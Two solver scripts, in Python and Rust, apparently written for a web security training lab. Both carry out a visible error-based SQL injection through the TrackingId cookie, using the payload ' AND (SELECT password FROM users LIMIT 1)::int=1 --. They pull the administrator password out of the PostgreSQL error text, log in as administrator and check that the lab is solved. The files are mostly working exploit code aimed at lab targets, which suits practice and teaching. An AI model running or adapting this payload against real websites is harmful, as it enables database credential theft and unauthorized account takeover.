File: with-python/sql-injection/11-visible-error-based-sql-injection.py
from lib import (
    SESSION,
    check_is_lab_solved,
    generate_parser,
    login_as_administrator,
)
import re

if __name__ == "__main__":
    args = generate_parser()

    lab_url = args.lab_url.strip("/")

    administrator_password = ""

    print("[+] Getting the `administrator` password")
    print(
        f"[!] Making request to {lab_url} with TrackingId=' AND (SELECT password FROM users LIMIT 1)::int=1 --"
    )

    response = SESSION.get(
        f"{lab_url}/",
        cookies={"TrackingId": "' AND (SELECT password FROM users LIMIT 1)::int=1 --"},
    )

    if response.status_code == 500:
        result = re.search(
            r'ERROR: invalid input syntax for type integer: "(.+?)"', response.text
        )

        if result:
            administrator_password = result.group(1)
            print(f"[+] Found `administrator` password: {administrator_password}")
        else:
            print("[-] Failed to find `administrator` password")

    else:
        print("[-] Failed to get `administrator` password")

    login_as_administrator(lab_url, administrator_password)

    check_is_lab_solved(lab_url)

File: with-rust/server-side/sql-injection/src/bin/11-visible-error-based-sql-injection.rs
use regex::Regex;
use reqwest::header::COOKIE;
use server_side_sql_injection::{
    HTTP_CLIENT, check_is_lab_solved, generate_clap_parser, login_as_administrator,
};
use std::sync::LazyLock;

static GET_PASSWORD_REGEX: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r#"ERROR: invalid input syntax for type integer: "(.+?)""#)
        .expect("[-] Failed to generate TRACKING_ID_REGEX")
});

fn main() {
    let args = generate_clap_parser();

    let lab_url = args.lab_url.as_str().trim_end_matches("/");

    logger::info("Getting the `administrator` password");

    logger::info(format!("Making request to {} with TrackingId=' AND (SELECT password FROM users LIMIT 1)::int=1 --", lab_url).as_ref());

    let response = HTTP_CLIENT
        .get(format!("{}/", lab_url))
        .header(
            COOKIE,
            // https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-error-based
            "TrackingId=' AND (SELECT password FROM users LIMIT 1)::int=1 --",
        )
        .send()
        .expect("Failed to send a GET request to /");

    if response.status() == 500 {
        let body = response
            .text()
            .expect("[-] Failed to extract text from response");

        let administrator_password = GET_PASSWORD_REGEX
            .captures(body.as_ref())
            .expect("[-] Failed to get captures from GET_PASSWORD_REGEX")
            .get(1)
            .expect("[-] No captures were found at position 1")
            .as_str();

        login_as_administrator(lab_url, administrator_password.to_string());
    } else {
        panic!(
            "{}",
            logger::error_return("Failed to GET `administrator` password")
        )
    }

    check_is_lab_solved(lab_url);
}
